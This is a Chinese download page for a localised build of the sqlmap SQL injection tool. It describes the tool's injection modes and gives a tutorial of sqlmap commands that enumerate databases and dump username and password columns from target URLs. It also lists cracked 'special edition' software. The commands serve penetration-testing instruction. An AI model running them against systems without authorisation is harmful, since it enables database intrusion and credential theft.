sqlmap是一款专业的sql注入工具,普遍适用于渗透测试,可以帮助用户发现数据库中存在的漏洞与风险,从而制定针对性解决方案。本次为大家带来的是sqlmap完整汉化版,内置简体中文支持,理解和使用都会更加的容易,不再以受到英语水平困扰,特被适合风险评估的朋友使用。
sqlmap拥有非常强大的检测引擎,能够自动检测和利用SQL注入漏洞,并且支持MySQL、Oracle、PostgreSQL等众多常见数据库,功能十分强大。
sqlmap特色介绍:
1、这是一款开源的渗透测试工具;
2、能够自动检测和利用SQL注入漏洞以及接入该数据库的服务器;
3、具有多种特性的渗透测试器;
4、支持五种不同的注入模式。
sqlmap注入模式介绍:
UNION query SQL injection(可联合查询注入)
Error-based SQL injection(报错型注入)
Boolean-based blind SQL injection(布尔型注入)
Time-based blind SQL injection(基于时间延迟注入)
Stacked queries SQL injection(可多语句查询注入)
英文看不懂的朋友可以对照下方的中文注释。
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap安装教程:
1、下载完成后解压;
2、使用cmd命令运行sqlmap;
3、记住要使用python2运行。
sqlmap使用教程:
【检测注入】
sqlmap -u “http://www.vuln.cn/post.php?id=1”
默认使用level1检测全部数据库类型
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3
指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
【cookie注入】
当程序有防get注入的时候,可以使用cookie注入
sqlmap -u “http://www.xxx.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)
【从post数据包中注入】
可以使用burpsuite或者temperdata等工具来抓取post包
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数
【获取数据库基本信息】
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs
查询有哪些数据库
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables
查询test数据库中有哪些表
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –columns
查询test数据库中admin表有哪些字段
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C “username,password” –dump
dump出字段username与password中的数据
sqlmap注入教程:
1.对url进行检测,判断是否存在SQL注入
python sqlmap.py -u "url" --batch
跑完以后发现存在注入,,参数是username 注入类型为盲注,数据库是mysql,后端语言是jsp
2.获取数据库
python sqlmap.py -u URL --dbs --batch 获取全部数据库
python sqlmap.py -u URL --current-db --batch 获取当前数据库
获取到了当前的数据库为 wavsepDB
3.获取当前数据库里所有表
python sqlmap.py -u URL -D wavsepDB --tables --batch
4.获取表的字段
python sqlmap.py -u URL -D wavsepDB -T users --columns --batch
如图获取到上面字段以后,我们就开始dump字段内容了。
5.dump字段内容
python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch
如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据
--dump 可以换成 --dump-all则导出全部的内容
sqlmap常用命令:
sqlmap -u [“url”] --dbs #获取数据库
sqlmap -u [“url”] --current-user #获取当前用户名称 :
sqlmap -u [“url”] --current-db #获取当前数据库名称
sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 :
sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns #列出字段
sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump #获取字段内容
- WinRAR Final(正版KEY/无视文件锁定)v2 烈火汉化特别版v3.93
- HyperSnap 烈火汉化绿色版(专业级抓图工具)8.11.00v8.11.00
- FlashFXP Beta1(3.7.9 Build 1348)烈火汉化绿色特别版v3.8
- ZoneAlarm Pro for 2000/XP(五星级个人防火墙))汉化特别版V7.0.438.000
- 超级巡警之U盘病毒免疫器 绿色版V1.5
- 抠图工具 TeoreX PhotoScissors 绿色汉化注册版v4.1
- MP3 Sound Cutter(小巧的MP3/WAV任意截取工具)汉化绿色特别版V1.41
- 卡巴斯基企业版KSOS (FS)服务器版(多用户五年授权版) 汉化正式版v9.1.0.59
- 风行 官方最新版v3.0.6.95
- Smart Defrag Portable 多国语言绿色便携版v6.4.0.256
- Wise Registry Cleaner Pro中文绿色版v10.2.6
- 音频编辑(Goldwave)汉化绿色版v6.32
- 飘雪动画秀(非常好的动画制作软件)单文件绿色版v3.10
- 照片制作成令人惊讶的卡通效果(Cartoon Maker Recorder 5.95)汉化绿色特别版v1.0.0.1
- Recuva Business Edition 多国语言绿色版v1.53
- MemTest(内存测试)专业汉化版v6.3
用户评论
最新评论
- 置顶 辽宁铁岭移动 网友 羁客
终于等到了
- 置顶 广西桂林电信 网友 心痛的笑
可以可以
- 置顶 甘肃定西电信 网友 东风寄千愁
谢谢小编大大分享,支持一下。。。
- 置顶 山西大同联通 网友 卷眼朦胧
更新还挺快的。
- 置顶 陕西安康电信 网友 半字浅眉-
小东西实用
最新专题
更多>最新更新
更多>热门标签
软件排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10